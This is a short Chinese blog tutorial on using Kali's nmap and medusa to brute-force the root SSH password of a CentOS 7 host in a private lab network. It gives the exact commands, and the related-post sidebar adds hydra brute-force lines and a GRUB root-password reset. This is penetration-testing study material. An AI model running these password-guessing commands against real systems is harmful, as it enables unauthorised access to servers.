Kali利用medusa破解CentOS7的root密码

最新推荐文章于 2024-05-30 16:52:10 发布
置顶 最新推荐文章于 2024-05-30 16:52:10 发布
阅读量3.4k 收藏 33
点赞数 4
分类专栏: 渗透测试学习 文章标签: Kali利用medusa破解CentOS7的root密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41709494/article/details/91351712
版权

1.扫描IP地址,查看有哪些开放的端口

root@kali:~# nmap -Pn  172.25.0.12
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 11:36 CST
Nmap scan report for 172.25.0.12
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

2.利用medusa破解ssh

root@kali:~# medusa -M ssh -h 172.25.0.12 -e ns -F -u root -P  /usr/share/wordlists/nmap.lst 

参数:
-M    #攻击模块的执行名称
-h    #攻击IP
-e    #n意为空密码,s意为密码与用户名相同 
-F    #破解到一个正确的密码即退出
-P    #密码字典

/usr/share/wordlists/            #这里是Kali软件自带的密码字典存放路径

 

 3.连接Xshell,验证密码

 

 

 

路来了
关注
  • 4
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
订阅专栏
Kali修改root密码及更换安装源.txt
05-08
Kali修改root密码及更换安装源
暴力破解Centos7并登陆实验,
qq_46258964的博客
06-15 657
环境准备: 1,kali 2,centos7 3,hydra 操作步骤: 1,扫描网段里的目标主机 nmap -sP 192.168.1.1-255 //扫描网段主机 nmap -sS 192.168.1.188 //扫描端口开放情况 扫描到22端口是开着的,进行下一步操作, 2,暴力破解 hydra -l root -P 1.1txt 192.168.1.188 ssh -l ------------------------- 指定用户 -P --------
暴力破解medusa美杜莎 hydra海德拉命令详情
最新发布
期待nila
05-30 433
本章借助nmap工具获取了模拟环境下服务端开放的高危端口,通过crunch工具生成了密码字典,通过hydar工具成功破解了服务端的,获取信息
centos7/8/kail密码破解大妈都会
小蔡的博客
04-24 3344
contos7.0系统密码破解 第一步:删除最后一行的rhgb和quiet,加上rd.break enforcing=0 ctrl+x 第二步:(/sysroot只有只读权限加写权限) mount -o remount,rw / sysroot 第3步:改变文件系统类型 chroot /sysroot 第4步: lang=en,passwd 第5步:重新标记所有文件 touch /.autorelabel 第6步:重新改为只读 mount -o remount,ro / exit reboot cont
kali中使用ssh证书通过ssh登录到CentOS7
m0_53499553的博客
04-08 2167
kali中申请私钥和公钥,执行命令:ssh-keygen -t rsa 上面的那个申请公钥和私钥的过程中,Enter passphrase选项和Enter same passphrase again选项是用来设置密码短语的,就是如果你想要在使用证书之前需要输入密码的话,可以去输入设置一下,如果不设置的话,这个密码短语是默认为空的,也就是不使用密码短语,一般情况下,我们在使用这个证书登录的时候是不去设置这个密码短语的 在执行完上面的命令之后,在kali中的/root/.ssh目录下面会多出两个文件,一个
CentOS 7 】密码破解与防破解
欢迎来到Dangks的博客!
11-28 4141
  虚拟机centos7root登录密码破解与防破解:一、密码破解(方法一)①需要挂载 :步骤总结:图文说明:②不需要挂载:步骤总结:图文说明:二、密码破解(方法二)步骤总结:图文说明:三、防破解(grub加密)四、破解grub加密   一、密码破解(方法一)     *方法一又有两种方法,但其实都是一样的,只是其中一个步骤稍微有点区别 ①需要挂载 : 步骤总结: 图文说明: 内核选择界面:启动服务器,进入内核选择界面按 e 进入内核参数编辑界面。 内核参数修改:按⬇找
CVE-2020-15778漏洞复现-kali2020.4&centos7
weixin_43867542的博客
07-19 1206
漏洞名称:openSSH 操作系统命令注入漏洞 等级危害:高危 CVSS评分:7.8 漏洞类型:操作系统命令注入 漏洞概述 OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产
入侵检测与防御——kali+CentOS 7+apache2+php5.4+mariadb
Mydyzdy_的博客
08-20 464
本文为入侵检测与防御课程的期末实验报告。希望自己的实验可以为后续学者做参考。
kali使用hydra工具进行ssh、ftp等密码爆破
Make
07-23 2万+
简介 hydra破解工具支持多种协议的登录密码,可以添加新组件,使用方便灵活。hydra可在Linux、Windows和OS X中使用。hydra可以用来破解很多种服务,包括IMAP,HTTP,SMB,VNC,MS-SQL,MySQL,SMTP等等 hydra的主要选项(摘自《Kail Linux&BackTrack渗透测试实战》) -R 修复之前使用的aborted/cras...
渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装)
zatongtong的博客
01-22 2218
Metasploit 渗透测试框架安装;渗透测试工具 MSF 安装;MSF 升级导致 MSF 环境丢失
利用Metasploit获取centos用户名和密码
weixin_33862188的博客
01-09 751
一、配置centos5.5服务器1、网卡配置设置网卡连接模式为nat2、网络配置Centos5.5的登录用户名和密码root和123456(1)vi etc/sysconfig/network-scripts/ifcfg-eth0配置ip地址的方式如下:配置完成之后重启网络Service network restsart使用ifconfig查看网络配置即可二、开启SSH服务...
kali重置root密码
07-13
自己在玩渗透测试的时候遇到的问题,root密码重置的具体步骤都在里面
利用kali破解wifi密码全过程.doc
05-21
kali linux 系统利用字典破解wifi密码教程 破解需要强大的字典,而且wifi模式有限制
Mysql 忘记root密码的完美解决方法
09-09
接下来,我们利用这个临时的无密码访问权限来更改root用户的密码。在命令行中输入`mysql`命令,你应该能直接进入MySQL的命令行界面。此时,无需提供密码即可登录。 在MySQL的命令行界面中,执行以下SQL语句来更新...
Kali Linux / centOS 7 SSH踩过得坑(不定期更新)
Kind&红衣的博客
08-11 2135
0x00: 最近学习kali linux,闻之初是三年前了。随已不是从前计划中的自己,但也尽力去突破新的自己。       环境:kali-linux 2018-2amd64镜像 0x01:关于ssh输入密码无法登陆的坑 cause :一开始好好的,开机后就连接不上了。看了看/etc/ssh/ssh_config文件,少了很多配置,重装了很多遍还是这样 解决:找遍百度基本都与我的配置不一样...
Centos7.X进程管理,攻击流程,信息收集
weixin_44984622的博客
11-02 288
Centos7.X进程管理,攻击流程,信息收集
Kali 暴力破解--medusa/hydra/xhydra
xmj818719的博客
03-05 1万+
1 实战-使用 hydra 工具在线破解系统用户密码 2 实战-使用 Medusa 工具在线破解 3 实战-图形化暴力破解软件 xhydra 4 离线破解 md5 值和 shadow 加密文件 环境 Kali Centos7(192.168.0.9) Win7(192.168.0.5) 1 实战-使用 hydra 工具在线破解系统用户密码 内容: 1.1通过WIN7得445端口得smb服务使用hydra进行暴力破解, 1.2通过3389端口得rdp协议破解密码. 1.3通过密码进行远程
Kali常见攻击手段
热门推荐
weixin_45565886的博客
02-07 2万+
Kali常见攻击手段
Kali Linux渗透测试——提权
Captain_RB的博客
03-03 4282
Kali Linux渗透测试——提权 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——提权一、关于权限(一)WindowsNT(二)Linux 一、关于权限 对不同的用户设置合适的权限是保证多任务操作系统安全的重要一环,取得shell并拿到系统权限,就相当于完全掌握了攻击目标的控制权。设置用户权限的一个基本原则即:设置最少的服务,分配最小...
kali渗透centos7
03-07
3. 密码破解:使用Kali Linux中的密码破解工具,如John the Ripper、Hydra等,对CentOS 7系统的登录凭证进行暴力破解或字典攻击,以获取登录权限。 4. 远程访问:利用Kali Linux中的远程访问工具,如Metasploit、...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

路来了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值